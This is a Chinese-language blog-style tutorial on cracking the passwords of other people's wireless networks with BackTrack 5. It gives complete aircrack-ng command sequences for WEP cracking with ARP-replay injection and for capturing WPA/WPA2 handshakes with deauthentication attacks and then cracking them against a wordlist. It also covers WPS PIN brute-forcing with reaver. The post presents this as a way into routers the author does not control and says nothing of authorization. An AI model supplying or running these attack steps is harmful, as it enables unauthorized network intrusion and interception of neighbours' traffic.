对于无线网密钥进行破解,玩了快一个月了,软件都是基于linux系统的,BT系列也是linux系统的一个分支(很专业的网络检测系统),也试过CDlinux9.6和Beini五合一版本(网上据说不再更新了),最后还是选择了BT5 R2。
BT系列对于大部分人来说是很难学会的,它完全不同与windows系统,它是一个以doc(命令)界面为主,辅之以图形界面的。命令很多,接下来就简单的讲讲无线网破解的一些基本命令(软件都是内置好的),如果不习惯命令式操作,可以自己去网上找minidwep(最简单的一个无线破解软件)的deb文件。
可以通过vm虚拟机模拟(需要USB无线网卡,最好是卡皇,破解对wpa2信号要求很高) ,也可以通过U盘安装(需UNetbootin),直接通过BIOS设置进入即可,无需安装。(也可能不支持内置网卡,linux系统对PC的要求很变态,这点很像苹果系统)
1. wep加密破解:
ifconfig -a 查看所有的网卡
ifconfig wlan0 up 激活无线网卡
airmon-ng start wlan0设置无线网卡模式
airodump-ng mon0 查看无线网络信息
airodump-ng --ivs -w akast -c 6 mon0 抓包(-c是指频道,后面跟着我要破解的路由器的信号频道,也就是6)
aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-b后面跟着的是目标MAC地址。-h后面跟着的是本机的无线网卡MAC地址。)
aircrack-ng akast*.ivs 开始破解
2.wpa或wpa2破解(其实这两种加密方式并没有被完全破解,能破解运气占很大的成分)
第一种是抓包后跑字典
ifconfig -a 查看所有的网卡
ifconfig wlan0 up 激活无线网卡
airmon-ng start wlan0设置无线网卡模式
airodump-ng mon0 查看无线网络信息
airodump-ng -w akast -c 6 mon0 抓包
aireplay-ng -0 1 -a 00:21:27:63:41:CE -c 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-a后面跟着的是目标MAC地址。-c后面跟着的是本机的无线网卡MAC地址。)
aircrack-ng -w 密码字典akast*.cap 开始破解
backtrack自带的密码列表:/pentest/wireless/aircrack-ng/lest/password.lst
也可以在windows下用EWSA跑字典(利用CPU和GPU的,我电脑立马出现问题,不建议)
第二种方法利用reaver进行pin解(也不是很可靠,拼人品的)
ifconfig -a 查看所有的网卡
ifconfig wlan0 up 激活无线网卡
airmon-ng start wlan0设置无线网卡模式
airodump-ng mon0 查看无线网络信息
wash -i mon0 -C
reaver -i mon0 -b MAC地址 -a -S -vv(如果出现timeout或者trying pin 12345670后不动了,可以重新试试)
接下来说说其中有些英文表示的意思(不愿意看的直接略过)
AP(无线网)
BSSID——这个就是路由器的MAC地址了。
PWR——这个是信号强度。
Beacons——这个是路由器对外发包,可能是SSID广播。
#Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击。
#/s——DATA增加的速度。
CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。
MB——无线的速度,现在一般都是54MB的了。
CIPHER——加密方式。
AUTH——这个应该是authorization的缩写,也就是授权的意思。
ESSID——简单理解,这个就是路由器的名字了。
最后说一句,最好有客户端在线(即有人在使用中),不然没有Data,平添不少难度。(feedbottle似乎可以,不过伪连对于信号要求似乎很高,我的小USB网卡能伪连,却无法发送数据包,郁闷!)